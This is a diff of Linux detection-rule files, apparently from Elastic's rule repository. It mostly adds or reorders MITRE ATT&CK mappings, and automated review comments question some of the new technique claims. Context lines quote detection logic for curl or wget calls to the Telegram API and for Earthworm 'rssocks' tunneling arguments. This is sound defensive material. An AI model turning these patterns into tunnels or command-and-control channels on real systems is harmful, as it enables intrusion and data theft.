@@ -120,17 +120,27 @@ process.name in ("curl", "wget") and process.command_line like "*api.telegram.or [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" - - [[rule.threat.technique]] - name = "Application Layer Protocol" - id = "T1071" - reference = "https://attack.mitre.org/techniques/T1071/" - - [[rule.threat.technique.subtechnique]] - name = "Web Protocols" - id = "T1071.001" - reference = "https://attack.mitre.org/techniques/T1071/001/" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" + +[[rule.threat.technique]] +id = "T1102" +name = "Web Service" +reference = "https://attack.mitre.org/techniques/T1102/" + +[[rule.threat.technique.subtechnique]] +id = "T1102.002" +name = "Bidirectional Communication" +reference = "https://attack.mitre.org/techniques/T1102/002/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/command_and_control_tunneling_via_earthworm.toml b/rules/linux/command_and_control_tunneling_via_earthworm.toml index be519817da2..4146d2eb91d 100644 --- a/rules/linux/command_and_control_tunneling_via_earthworm.toml +++ b/rules/linux/command_and_control_tunneling_via_earthworm.toml @@ -2,7 +2,7 @@ creation_date = "2021/04/12" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [transform] [[transform.osquery]] 
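Review bot: T1102.002 Bidirectional Communication is added to `command_and_control_telegram_api_request.toml`, but the visible query context (`process.name in ("curl", "wget") and process.command_line like "*api.telegram.or…"`) matches a single outbound request and cannot tell whether the channel is two-way — a `sendMessage` beacon is T1102.003 One-Way Communication, a `getUpdates` poll is bidirectional, and a token lookup is closer to T1102.001 Dead Drop Resolver. Unless the query is narrowed to methods that imply tasking, the parent T1102 Web Service without a subtechnique is the claim the rule can support; since `id = "T1102"` / `name = "Web Service"` is already present, just drop the `[[rule.threat.technique.subtechnique]]` block beneath it. The rest of the hunk is a layout normalization (tactic moved below the techniques, indentation removed) with no semantic change.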
@@ -177,6 +177,11 @@ process.args : "-s" and process.args : "-d" and process.args : "rssocks" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" diff --git a/rules/linux/credential_access_aws_creds_search_inside_container.toml b/rules/linux/credential_access_aws_creds_search_inside_container.toml index 77439cd442d..809b7166137 100644 --- a/rules/linux/credential_access_aws_creds_search_inside_container.toml +++ b/rules/linux/credential_access_aws_creds_search_inside_container.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/12" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -116,3 +116,29 @@ reference = "https://attack.mitre.org/techniques/T1552/001/" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/linux/credential_access_collection_sensitive_files.toml b/rules/linux/credential_access_collection_sensitive_files.toml index 71d52ec71c9..537425e980b 100644 --- a/rules/linux/credential_access_collection_sensitive_files.toml +++ b/rules/linux/credential_access_collection_sensitive_files.toml 
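Review bot: `credential_access_aws_creds_search_inside_container.toml` now claims T1005 Data from Local System under a new Collection tactic, but a rule that fires on searching for credential files (per its name) observes discovery and credential access, not collection — T1083 File and Directory Discovery (also added here) and the existing T1552.001 already cover it, and T1005 overstates what was detected. Consider dropping the Collection entry, or keep it only if the query (outside the hunk) also matches reading or copying the file contents. Two new tactics also mean `"Tactic: Collection"` and `"Tactic: Discovery"` tags are expected in `tags` if tags mirror threat tactics, and no tags hunk is present for this file.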
@@ -2,7 +2,7 @@
 creation_date = "2020/12/22"
 integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/02"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -171,6 +171,11 @@ reference = "https://attack.mitre.org/tactics/TA0006/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1005"
+name = "Data from Local System"
+reference = "https://attack.mitre.org/techniques/T1005/"
+
 [[rule.threat.technique]]
 id = "T1560"
 name = "Archive Collected Data"
@@ -185,7 +190,6 @@ reference = "https://attack.mitre.org/techniques/T1560/001/"
 id = "TA0009"
 name = "Collection"
 reference = "https://attack.mitre.org/tactics/TA0009/"
-
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["host.id", "process.command_line", "process.parent.executable"]
diff --git a/rules/linux/credential_access_collection_sensitive_files_compression_inside_container.toml b/rules/linux/credential_access_collection_sensitive_files_compression_inside_container.toml
index 417321d89b0..160f0356f1d 100644
--- a/rules/linux/credential_access_collection_sensitive_files_compression_inside_container.toml
+++ b/rules/linux/credential_access_collection_sensitive_files_compression_inside_container.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/03/12"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -119,6 +119,11 @@ reference = "https://attack.mitre.org/tactics/TA0006/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1005"
+name = "Data from Local System"
+reference = "https://attack.mitre.org/techniques/T1005/"
+
 [[rule.threat.technique]]
 id = "T1560"
 name = "Archive Collected Data"
diff --git a/rules/linux/credential_access_credential_dumping.toml b/rules/linux/credential_access_credential_dumping.toml
index 777c602f05e..4b773d25664 100644
--- a/rules/linux/credential_access_credential_dumping.toml
+++ b/rules/linux/credential_access_credential_dumping.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/02/27"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -121,3 +121,16 @@ reference = "https://attack.mitre.org/techniques/T1003/008/"
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1005"
+name = "Data from Local System"
+reference = "https://attack.mitre.org/techniques/T1005/"
+
+[rule.threat.tactic]
+id = "TA0009"
+name = "Collection"
+reference = "https://attack.mitre.org/tactics/TA0009/"
diff --git a/rules/linux/credential_access_gdb_init_process_hooking.toml b/rules/linux/credential_access_gdb_init_process_hooking.toml
index 646c05881fc..fe09ce66225 100644
--- a/rules/linux/credential_access_gdb_init_process_hooking.toml
+++ b/rules/linux/credential_access_gdb_init_process_hooking.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/08/30"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -122,3 +122,16 @@ reference = "https://attack.mitre.org/techniques/T1003/007/"
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1005"
+name = "Data from Local System"
+reference = "https://attack.mitre.org/techniques/T1005/"
+
+[rule.threat.tactic]
+id = "TA0009"
+name = "Collection"
+reference = "https://attack.mitre.org/tactics/TA0009/"
diff --git a/rules/linux/credential_access_gdb_process_hooking.toml b/rules/linux/credential_access_gdb_process_hooking.toml
index af461be6f71..a8d9e3c988d 100644
--- a/rules/linux/credential_access_gdb_process_hooking.toml
+++ b/rules/linux/credential_access_gdb_process_hooking.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/08/30"
 integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -87,19 +87,36 @@ process.args != "1"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1003"
 name = "OS Credential Dumping"
 reference = "https://attack.mitre.org/techniques/T1003/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1003.007"
 name = "Proc Filesystem"
 reference = "https://attack.mitre.org/techniques/T1003/007/"
-
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1055"
+name = "Process Injection"
+reference = "https://attack.mitre.org/techniques/T1055/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1055.008"
+name = "Ptrace System Calls"
+reference = "https://attack.mitre.org/techniques/T1055/008/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/linux/credential_access_gh_auth_via_nodejs.toml b/rules/linux/credential_access_gh_auth_via_nodejs.toml
index 1ab982a0861..0fbe0239223 100644
--- a/rules/linux/credential_access_gh_auth_via_nodejs.toml
+++ b/rules/linux/credential_access_gh_auth_via_nodejs.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/09/18"
 integration = ["endpoint", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -69,16 +69,16 @@ process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1552"
-name = "Unsecured Credentials"
-reference = "https://attack.mitre.org/techniques/T1552/"
-
 [[rule.threat.technique]]
 id = "T1528"
 name = "Steal Application Access Token"
 reference = "https://attack.mitre.org/techniques/T1528/"
+[[rule.threat.technique]]
+id = "T1552"
+name = "Unsecured Credentials"
+reference = "https://attack.mitre.org/techniques/T1552/"
+
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
@@ -96,3 +96,21 @@ reference = "https://attack.mitre.org/techniques/T1613/"
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/linux/credential_access_kubernetes_service_account_secret_access.toml b/rules/linux/credential_access_kubernetes_service_account_secret_access.toml
index b4054ccf7f8..a81e911e3b7 100644
--- a/rules/linux/credential_access_kubernetes_service_account_secret_access.toml
+++ b/rules/linux/credential_access_kubernetes_service_account_secret_access.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/06/17"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -134,15 +134,20 @@ not (
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1528"
+name = "Steal Application Access Token"
+reference = "https://attack.mitre.org/techniques/T1528/"
+
 [[rule.threat.technique]]
 id = "T1552"
 name = "Unsecured Credentials"
 reference = "https://attack.mitre.org/techniques/T1552/"
-[[rule.threat.technique]]
-id = "T1528"
-name = "Steal Application Access Token"
-reference = "https://attack.mitre.org/techniques/T1528/"
+[[rule.threat.technique.subtechnique]]
+id = "T1552.001"
+name = "Credentials In Files"
+reference = "https://attack.mitre.org/techniques/T1552/001/"
 [rule.threat.tactic]
 id = "TA0006"
@@ -161,3 +166,16 @@ reference = "https://attack.mitre.org/techniques/T1613/"
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1005"
+name = "Data from Local System"
+reference = "https://attack.mitre.org/techniques/T1005/"
+
+[rule.threat.tactic]
+id = "TA0009"
+name = "Collection"
+reference = "https://attack.mitre.org/tactics/TA0009/"
diff --git a/rules/linux/credential_access_manual_memory_dumping.toml b/rules/linux/credential_access_manual_memory_dumping.toml
index d6f5ffe2135..5cfc95bc8ce 100644
--- a/rules/linux/credential_access_manual_memory_dumping.toml
+++ b/rules/linux/credential_access_manual_memory_dumping.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/04/25"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -129,3 +129,16 @@ reference = "https://attack.mitre.org/techniques/T1212/"
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1005"
+name = "Data from Local System"
+reference = "https://attack.mitre.org/techniques/T1005/"
+
+[rule.threat.tactic]
+id = "TA0009"
+name = "Collection"
+reference = "https://attack.mitre.org/tactics/TA0009/"
diff --git a/rules/linux/credential_access_potential_linux_ssh_bruteforce_internal.toml b/rules/linux/credential_access_potential_linux_ssh_bruteforce_internal.toml
index 020628dd4f9..968fb29c84f 100644
--- a/rules/linux/credential_access_potential_linux_ssh_bruteforce_internal.toml
+++ b/rules/linux/credential_access_potential_linux_ssh_bruteforce_internal.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/02/21"
 integration = ["system"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -115,3 +115,21 @@ reference = "https://attack.mitre.org/techniques/T1110/003/"
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1021"
+name = "Remote Services"
+reference = "https://attack.mitre.org/techniques/T1021/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1021.004"
+name = "SSH"
+reference = "https://attack.mitre.org/techniques/T1021/004/"
+
+[rule.threat.tactic]
+id = "TA0008"
+name = "Lateral Movement"
+reference = "https://attack.mitre.org/tactics/TA0008/"
diff --git a/rules/linux/credential_access_potential_successful_linux_ssh_bruteforce.toml b/rules/linux/credential_access_potential_successful_linux_ssh_bruteforce.toml
index 8f8c9f7c185..f49bfa664f9 100644
--- a/rules/linux/credential_access_potential_successful_linux_ssh_bruteforce.toml
+++ b/rules/linux/credential_access_potential_successful_linux_ssh_bruteforce.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/09/14"
 integration = ["system"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -117,3 +117,16 @@ reference = "https://attack.mitre.org/techniques/T1110/003/"
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
diff --git a/rules/linux/credential_access_proc_credential_dumping.toml b/rules/linux/credential_access_proc_credential_dumping.toml
index f543e3ff547..1ffd1eadd04 100644
--- a/rules/linux/credential_access_proc_credential_dumping.toml
+++ b/rules/linux/credential_access_proc_credential_dumping.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/04/26"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -131,3 +131,16 @@ reference = "https://attack.mitre.org/techniques/T1212/"
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1057"
+name = "Process Discovery"
+reference = "https://attack.mitre.org/techniques/T1057/"
+
+[rule.threat.tactic]
+id = "TA0007"
+name = "Discovery"
+reference = "https://attack.mitre.org/tactics/TA0007/"
diff --git a/rules/linux/credential_access_sensitive_keys_or_passwords_search_inside_container.toml b/rules/linux/credential_access_sensitive_keys_or_passwords_search_inside_container.toml
index 0b636c1f0b6..a1fe4c1add7 100644
--- a/rules/linux/credential_access_sensitive_keys_or_passwords_search_inside_container.toml
+++ b/rules/linux/credential_access_sensitive_keys_or_passwords_search_inside_container.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/03/12"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -117,3 +117,16 @@ reference = "https://attack.mitre.org/techniques/T1552/001/"
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1083"
+name = "File and Directory Discovery"
+reference = "https://attack.mitre.org/techniques/T1083/"
+
+[rule.threat.tactic]
+id = "TA0007"
+name = "Discovery"
+reference = "https://attack.mitre.org/tactics/TA0007/"
diff --git a/rules/linux/credential_access_ssh_backdoor_log.toml b/rules/linux/credential_access_ssh_backdoor_log.toml
index 1a136471d12..90c1c3704e2 100644
--- a/rules/linux/credential_access_ssh_backdoor_log.toml
+++ b/rules/linux/credential_access_ssh_backdoor_log.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/12/21"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -170,3 +170,21 @@ reference = "https://attack.mitre.org/techniques/T1554/"
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1074"
+name = "Data Staged"
+reference = "https://attack.mitre.org/techniques/T1074/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1074.001"
+name = "Local Data Staging"
+reference = "https://attack.mitre.org/techniques/T1074/001/"
+
+[rule.threat.tactic]
+id = "TA0009"
+name = "Collection"
+reference = "https://attack.mitre.org/tactics/TA0009/"
diff --git a/rules/linux/credential_access_ssh_password_grabbing_via_strace.toml b/rules/linux/credential_access_ssh_password_grabbing_via_strace.toml
index feb93587467..449714c3174 100644
--- a/rules/linux/credential_access_ssh_password_grabbing_via_strace.toml
+++ b/rules/linux/credential_access_ssh_password_grabbing_via_strace.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/11/10"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/11/24"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -76,6 +76,11 @@ sequence by host.id with maxspan=3s
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1056"
+name = "Input Capture"
+reference = "https://attack.mitre.org/techniques/T1056/"
+
 [[rule.threat.technique]]
 id = "T1556"
 name = "Modify Authentication Process"
diff --git a/rules/linux/credential_access_unusual_instance_metadata_service_api_request.toml b/rules/linux/credential_access_unusual_instance_metadata_service_api_request.toml
index c58ad162a18..effcb209566 100644
--- a/rules/linux/credential_access_unusual_instance_metadata_service_api_request.toml
+++ b/rules/linux/credential_access_unusual_instance_metadata_service_api_request.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/08/22"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/09/29"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -182,31 +182,41 @@ sequence by host.id, process.parent.entity_id with maxspan=3s
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1552"
 name = "Unsecured Credentials"
 reference = "https://attack.mitre.org/techniques/T1552/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1552.005"
 name = "Cloud Instance Metadata API"
 reference = "https://attack.mitre.org/techniques/T1552/005/"
-
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1016"
+name = "System Network Configuration Discovery"
+reference = "https://attack.mitre.org/techniques/T1016/"
+
+[[rule.threat.technique]]
+id = "T1082"
+name = "System Information Discovery"
+reference = "https://attack.mitre.org/techniques/T1082/"
+
 [[rule.threat.technique]]
 id = "T1580"
 name = "Cloud Infrastructure Discovery"
 reference = "https://attack.mitre.org/techniques/T1580/"
-
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
-
diff --git a/rules/linux/defense_evasion_attempt_to_disable_auditd_service.toml b/rules/linux/defense_evasion_attempt_to_disable_auditd_service.toml
index 6b076f4a605..b340bee6522 100644
--- a/rules/linux/defense_evasion_attempt_to_disable_auditd_service.toml
+++ b/rules/linux/defense_evasion_attempt_to_disable_auditd_service.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/08/28"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -123,3 +123,16 @@ reference = "https://attack.mitre.org/techniques/T1562/001/"
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1489"
+name = "Service Stop"
+reference = "https://attack.mitre.org/techniques/T1489/"
+
+[rule.threat.tactic]
+id = "TA0040"
+name = "Impact"
+reference = "https://attack.mitre.org/tactics/TA0040/"
diff --git a/rules/linux/defense_evasion_attempt_to_disable_iptables_or_firewall.toml b/rules/linux/defense_evasion_attempt_to_disable_iptables_or_firewall.toml
index f1d091298b1..eea9e5baea5 100644
--- a/rules/linux/defense_evasion_attempt_to_disable_iptables_or_firewall.toml
+++ b/rules/linux/defense_evasion_attempt_to_disable_iptables_or_firewall.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/02/22"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -127,7 +127,25 @@ id = "T1562.001"
 name = "Disable or Modify Tools"
 reference = "https://attack.mitre.org/techniques/T1562/001/"
+[[rule.threat.technique.subtechnique]]
+id = "T1562.004"
+name = "Disable or Modify System Firewall"
+reference = "https://attack.mitre.org/techniques/T1562/004/"
+
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1489"
+name = "Service Stop"
+reference = "https://attack.mitre.org/techniques/T1489/"
+
+[rule.threat.tactic]
+id = "TA0040"
+name = "Impact"
+reference = "https://attack.mitre.org/tactics/TA0040/"
diff --git a/rules/linux/defense_evasion_attempt_to_disable_syslog_service.toml b/rules/linux/defense_evasion_attempt_to_disable_syslog_service.toml
index 716db12a621..b3ff2f7b3f7 100644
--- a/rules/linux/defense_evasion_attempt_to_disable_syslog_service.toml
+++ b/rules/linux/defense_evasion_attempt_to_disable_syslog_service.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/04/27"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -141,3 +141,16 @@ reference = "https://attack.mitre.org/techniques/T1562/001/"
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1489"
+name = "Service Stop"
+reference = "https://attack.mitre.org/techniques/T1489/"
+
+[rule.threat.tactic]
+id = "TA0040"
+name = "Impact"
+reference = "https://attack.mitre.org/tactics/TA0040/"
diff --git a/rules/linux/defense_evasion_authorized_keys_file_deletion.toml b/rules/linux/defense_evasion_authorized_keys_file_deletion.toml
index b1c2b0ae4e9..a7383503df1 100644
--- a/rules/linux/defense_evasion_authorized_keys_file_deletion.toml
+++ b/rules/linux/defense_evasion_authorized_keys_file_deletion.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/21"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -118,3 +118,16 @@ reference = "https://attack.mitre.org/techniques/T1070/004/"
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1531"
+name = "Account Access Removal"
+reference = "https://attack.mitre.org/techniques/T1531/"
+
+[rule.threat.tactic]
+id = "TA0040"
+name = "Impact"
+reference = "https://attack.mitre.org/tactics/TA0040/"
diff --git a/rules/linux/defense_evasion_base16_or_base32_encoding_or_decoding_activity.toml b/rules/linux/defense_evasion_base16_or_base32_encoding_or_decoding_activity.toml
index 5b514d442b2..11e14f7ebb2 100644
--- a/rules/linux/defense_evasion_base16_or_base32_encoding_or_decoding_activity.toml
+++ b/rules/linux/defense_evasion_base16_or_base32_encoding_or_decoding_activity.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/04/17"
 integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -142,3 +142,21 @@ reference = "https://attack.mitre.org/techniques/T1140/"
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1132"
+name = "Data Encoding"
+reference = "https://attack.mitre.org/techniques/T1132/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1132.001"
+name = "Standard Encoding"
+reference = "https://attack.mitre.org/techniques/T1132/001/"
+
+[rule.threat.tactic]
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
diff --git a/rules/linux/defense_evasion_base64_decoding_activity.toml b/rules/linux/defense_evasion_base64_decoding_activity.toml
index 375a8b62e4e..d0fee31c966 100644
--- a/rules/linux/defense_evasion_base64_decoding_activity.toml
+++ b/rules/linux/defense_evasion_base64_decoding_activity.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/21"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/01/16"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -201,6 +201,11 @@ id = "T1059.004"
 name = "Unix Shell"
 reference = "https://attack.mitre.org/techniques/T1059/004/"
+[[rule.threat.technique.subtechnique]]
+id = "T1059.006"
+name = "Python"
+reference = "https://attack.mitre.org/techniques/T1059/006/"
+
 [[rule.threat.technique]]
 id = "T1204"
 name = "User Execution"
diff --git a/rules/linux/defense_evasion_bpf_program_tampering.toml b/rules/linux/defense_evasion_bpf_program_tampering.toml
index f23dcdf2669..9c269d4eed0 100644
--- a/rules/linux/defense_evasion_bpf_program_tampering.toml
+++ b/rules/linux/defense_evasion_bpf_program_tampering.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/02/20"
 integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2026/02/20"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -89,6 +89,11 @@ process.name == "bpftool" and (
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1014"
+name = "Rootkit"
+reference = "https://attack.mitre.org/techniques/T1014/"
+
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
@@ -99,11 +104,6 @@ id = "T1562.001"
 name = "Disable or Modify Tools"
 reference = "https://attack.mitre.org/techniques/T1562/001/"
-[[rule.threat.technique]]
-id = "T1014"
-name = "Rootkit"
-reference = "https://attack.mitre.org/techniques/T1014/"
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
